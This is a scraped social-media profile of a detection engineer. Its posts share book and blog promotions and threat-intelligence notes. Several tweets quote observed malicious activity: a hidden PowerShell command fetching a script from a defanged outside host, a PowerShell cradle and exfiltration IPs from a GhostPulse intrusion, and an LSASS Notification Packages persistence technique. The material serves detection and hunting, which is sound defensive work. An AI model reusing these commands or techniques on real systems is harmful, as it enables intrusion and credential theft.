Olivia
Online
KoifSec
@KoifSec
Security research/detection, also writing for Enjoyer. Clippy is a threat actor. BSKY
Joined December 2021
177 Following
126 Followers
115 Posts
Pinned Tweet
I wrote a book!
A Dance of Red and Blue - the epistemology, game theory, and craft behind detection engineering.
Giving away copies. Reply with your best cybersec joke or meme and I'll pick some folks to send it to.
https://t.co/adLjKgt9Zb
https://t.co/n7l3oK0LV5
@m45c07 Thank you brother, glad you enjoyed!
I wrote a book!
A Dance of Red and Blue - the epistemology, game theory, and craft behind detection engineering.
Giving away copies. Reply with your best cybersec joke or meme and I'll pick some folks to send it to.
https://t.co/adLjKgt9Zb
https://t.co/n7l3oK0LV5
Komari just landed in LOLRMM and this one's different. Komari doesn't need to be abused to function as a C2. The control channel ships enabled by default. You point it at a server you control and type an install command. That's it.
@HuntressLabs caught it being dropped as a SYSTEM-level backdoor, disguised as "Windows Update Service", pulled straight from GitHub.
The line between "self-hosted monitoring" and "self-hosted C2" doesn't exist here. That's exactly why it belongs in the catalog.
Thanks @KoifSec for the contribution. 🫡
🔗 https://t.co/F800eBlKwO
🧩 https://t.co/znXERe8Zqn
📖 https://t.co/UkuxqWsqAl
Published a new post right now on DetectFYI:
"The Life-Dinner Principle in Detection", continuing from the latest post about arms race dynamics. Enjoy!
https://t.co/5Od0aPQ5NG
@SecurityAura Same vibes as
Found a TP today from the Axios incident. The observed command was:
C:\ProgramData\wt.exe -w hidden -ep bypass -file C:\Users\xxx\AppData\Local\Temp\6202033.ps1 http://sfrclak.[com]:8000
wt.exe running from unusual directories. Thanks to @HuntressLabs for their research on this.
Today I’m launching Threat Hunting Labs.
Over the years I’ve analyzed many real-world intrusions. One thing became obvious: most training platforms don’t resemble how investigations actually happen.
So I built something different.
Threat Hunting Labs focuses on investigation-driven learning using real telemetry and structured investigative paths.
If you want to get better at investigating breaches, you should practice investigating breaches.
More details here:
https://t.co/cAuuh7sTJN
@Kostastsale I had the pleasure of beta testing this, highly recommended if this is something you're interested in. Everything Kostas does is worth looking into!
New post out! "The Red Queen’s Race: Arms Race Dynamics in Threat Detection"
https://t.co/5d11xWZ1lV
@itsJaimeMedina Great writeup! gonna start testing it out for myself 🙂
New post out! https://t.co/wdwYWH95ze
If you're dealing with code packages or supply-chain risks, just open-sourced one of my tools - https://t.co/ZyMUJz97L6 - completely usable from the CLI as well. Enjoy!
LSASS DLL loading can be abused to establish persistence inside a highly privileged system process. This registry modification alters the Notification Packages value under the LSA key, causing LSASS to load additional packages at startup.
Any unexpected LSA Notification Packages entry should be treated as suspicious.
https://t.co/Bz0BmucfvY
@three_cube @_aircorridor @DI0256
#redteam #DFIR #blueteam #pentest
@ThruntingLabs I was one of the lucky firsts - I HIGHLY recommend trying this out if you get the chance - this one is different.
We invited the first 150 users who signed up for early access. All invitees receive free credits to go through the investigations we currently have in beta. Great feedback so far!🙏
We will invite the second wave early next week! Thank you to everyone who is providing feedback!
Introducing the "Adversarial Detection Engineering (ADE) Framework" !
Developed by myself and Nikolas Bielski, ADE aims to be for detection rules what MITRE is for attack techniques and CWE is for code.
https://t.co/crbFpvoKmD
https://t.co/IkfCzc37Bs
I came across a GhostPulse/HijackLoader intrusion via ClickFix with some interesting evasion techniques.
Starts with a PowerShell cradle (178.17.59\.26:5506) deploying an MSI dropper. The GhostPulse loader (81f9a196...) has 0 detections on VT despite being a known binary — still figuring out how it was weaponized: https://t.co/NttLBMpSgb
PlaneV128.exe registers a keylogger (RegisterRawInputDevices), injects into Chrome/Edge via SetThreadContext, and launches browsers in headless mode for credential harvesting. Hardware breakpoints set for anti-debugging.
PlaneV128.exe dropped sup.msi (164MB) which extracted the superintendent application during its update routine. 172MB exfil to 84.21.173.142:80 over ~18 min. Persistence via Run key (HyperPackQuickCoreator → C:\Users\<user>\AppData\Local\MegaMaxion\superintendent.exe). The superintendent.exe binary appears to be legitimate software, currently investigating for possible DLL side-loading…
explorer.exe
└─ powershell.exe -nop -w hidden
└─ msiexec.exe s1161271080.msi
└─ S_Circuitr.exe
└─ PlaneV128.exe (GhostPulse)
├─ chrome.exe --headless
├─ msedge.exe --headless
└─ msiexec.exe sup.msi
└─ superintendent.exe
Signed executables using ZONER/Crisp IM certificates observed throughout the chain.
Links:
• https://t.co/gfpION5bcZ
• https://t.co/cHZ4JThw1W
• https://t.co/SME0uLFhKi
Hunt for PowerShell cradles paired with --headless browser launches.
What's particularly interesting: Multiple components have zero detection. If you've seen similar intrusions or have insights on superintendent.exe/this chain, please comment below or reach out.
cc @malwrhunterteam
New post out! "Move and Countermove: Game Theory Aspects of Detection Engineering"
https://t.co/vphVkBxC3p
#GoreloRMM being pushed via a suspected email phishing campaign where the URL leads the user to a site with a "Download Proposal" button. This downloads a raw Gorelo installer.
Same lure/tactic used as another campaign at the beginning of the month that pushed #ImmyBot.
VT next
Last Seen Users on Sotwe
Fozia Jani
Seen from Italy
Yudi12
Seen from Singapore
alperen
Seen from United Arab Emirates
서닐
Seen from India
will pyun 
Seen from Brazil
Nanoscopic
Seen from United States
Jane
Seen from Italy
❤TURBANLI SEX❤
Seen from Turkey
Hairy Mania 🦍(Kıllı erkek dünyası)
Seen from Turkey
🐽
Seen from Singapore
Most Popular Users
Elon Musk
@elonmusk
240.1M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.8M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.2M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.5M followers
KATY PERRY
@katyperry
86.7M followers
Taylor Swift
@taylorswift13
80.5M followers
Lady Gaga
@ladygaga
72.1M followers
Kim Kardashian
@kimkardashian
69.4M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.4M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61M followers
X
@x
60.9M followers
CNN Breaking News
@cnnbrk
59.9M followers